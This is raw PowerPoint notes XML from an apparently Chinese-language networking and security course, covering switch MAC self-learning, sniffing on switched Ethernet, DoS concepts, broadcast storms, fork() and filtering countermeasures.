          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>在交换式以太网中仍然可以嗅探到一些其它节点之间交换的数据帧</a:t>
            </a:r>
            <a:endParaRPr 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FD68CAC-2F9B-4EEC-A5EE-9D422A3928A2}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="136195"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交换机的源 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>地址自学习 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>—</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>获取每个帧的源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>地址，建立（ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" smtClean="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" smtClean="0"/>
              <a:t>地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" smtClean="0"/>
              <a:t>接口）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>交换表。</a:t>
            </a:r>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109D9529-C27B-4BD6-A900-3AEADBFCBAED}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135171"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提出交换机在链路层对帧的转发原理，看似路由问题。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>路由是特指路由器在网络层根据分组的目的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>地址匹配</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>路由表表项来选择转发</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>接口。路由表是一个目的网络地址与下一跳路由器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>接口地址（对应该路由器的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>接口地址）的映射表。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>交换机转发是在链路层根据帧的目的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>地址匹配交换表表项选择转发接口。交换表是一个交换机接口号与接口下属</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>地址的映射表。</a:t>
            </a:r>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519D52D9-B797-42C1-9C0D-4FA8CEB3CCEB}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137219"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注意：了解只有在节点开机运行网络接口发送数据帧后，交换机才能自学习到该节点的源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>地址，建立该节点源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>地址的对应交换机接口表项。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>通过实例来认识交换机的工作原理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>—</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>地址自学习与帧转发。</a:t>
            </a:r>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A0E55B87-9E2B-425F-895D-7BB57428DFA5}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138243"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8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注意：了解只有在节点开机运行网络接口发送数据帧后，交换机才能自学习到该节点的源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>地址，建立该节点源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>地址的对应交换机接口表项。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>通过实例来认识交换机的工作原理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>—</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>地址自学习与帧转发。</a:t>
            </a:r>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B8CFE4A-7FE1-43B9-8F16-50D278681DB7}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="139267"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B8CFE4A-7FE1-43B9-8F16-50D278681DB7}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="139267"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41A57920-A7BD-40BF-9833-BD585BBDC49A}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="140291" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="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注意：了解只有在节点开机运行网络接口发送数据帧后，交换机才能自学习到该节点的源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>地址，建立该节点源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>地址的对应交换机接口表项。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>通过实例来认识交换机的工作原理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>—</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>地址自学习与帧转发。</a:t>
            </a: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5C04DCA-75F5-4EC0-8CF9-C2D3CE41AF95}"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7635" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>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smtClean="0"/>
              <a:t>交换机表的每个表项包括三个字段：节点的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>地址；该</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>地址对应的端口；该表项在表中的时间。交换机通过自学习功能来建立交换机表，即通过观察帧的源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>地址和到达端口来建立</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>地址和端口的映射关系。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>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BB2F9E09-5D5A-47F3-A57D-C1DD3A2C1772}"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2338" name="Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2147483647" y="166463663"/>
            <a:ext cx="0" cy="21470112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2339"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mtClean="0"/>
              <a:t>解决方案：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>入口过滤</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>出口过滤</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>回溯技术</a:t>
            </a:r>
            <a:endParaRPr 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31"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3A4D173C-6080-458B-A520-F1026D27E4F1}"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5955" name="Rectangle 1026"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="125956" name="Rectangle 1027"/>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mtClean="0"/>
              <a:t>DOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>攻击就好比有成千上万个人同时、不间断地拨打您的电话，此时您朋友的重要电话也就打不进来。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{CBFE4DFC-C6C0-4324-B543-DCD78846A7C0}"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31"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{54B90720-33B4-448E-A3A4-97DF6768709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6979" name="Rectangle 1026"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="126980" name="Rectangle 1027"/>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 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>  程序分歧</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>fork()    </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>  fork()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>会产生一个与父程序相同的子程序，唯一不同之处在於其</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>process id(pid)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>。  </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>  如果我们要撰写守护神程序，或是例如网路伺服器，需要多个行程来同时提供多个连线，可以利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>fork()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>来产生多个相同的行程。</a:t>
            </a:r>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ADE3C6AF-E3C2-4830-B2A5-7F1AB7CB1C3D}"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计算机系统配置不当可能造成系统运行不正常，甚至根本不能运行。攻击者通过改变或者破坏系统的配置信息，阻止其他合法用户使用计算机网络提供的服务。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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A896B642-1445-4BC3-A734-A6086FBC8BCA}"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一个简单的攻击类型是广播风暴。攻击者可以生成这样一个消息，它将指示每一个收到数据报的主机回答或者重发这个消息。结果网络饱和，并且不能使用。广播风暴很少是由故意的攻击所致，它通常是由于硬件或者软件的缘故，例如，正在开发之中，存在错误或者没有正确地安装。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>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B70532FC-BA39-49D9-AD5E-CF6D056C6DB2}"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7CC8389D-8ECC-4384-8D03-07BA92C5DA07}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" panose="020B060402020202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D0B34A8-D4EB-45F2-AA13-5CE63FB36BD2}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-AU" sz="1200" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="zh-CN" sz="1200" smtClean="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="198659" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="198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16975898-C061-48FB-B864-A7EC22E2C2ED}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="368642" name="Rectangle 1026"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="368643" name="Rectangle 1027"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>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fld id="{D1938ABF-D8D1-4E5F-92C1-AA8BCC6C8FAD}" type="slidenum">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" smtClean="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latin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fld id="{E724B8A7-FA3C-4521-B3D1-E66C7723A584}" type="slidenum">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" smtClean="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65539" name="Rectangle 1026"/>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40"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latin typeface="Times New Roman" panose="02020603050405020304"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31"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9F5E30AE-0CAE-40C6-B94D-FDE64C77FC21}"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p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="129028" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" smtClean="0"/>
              <a:t>受影响的系统：大多数操作系统和路由器</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN"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AE57A7BC-F5ED-44A8-AF5B-F6A08FC381B5}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="373762" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3737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itchFamily="2" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"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itchFamily="2" charset="-122"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:fld id="{9C485832-C2C7-456A-9BD8-EDDAA9E9A8DD}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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31"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
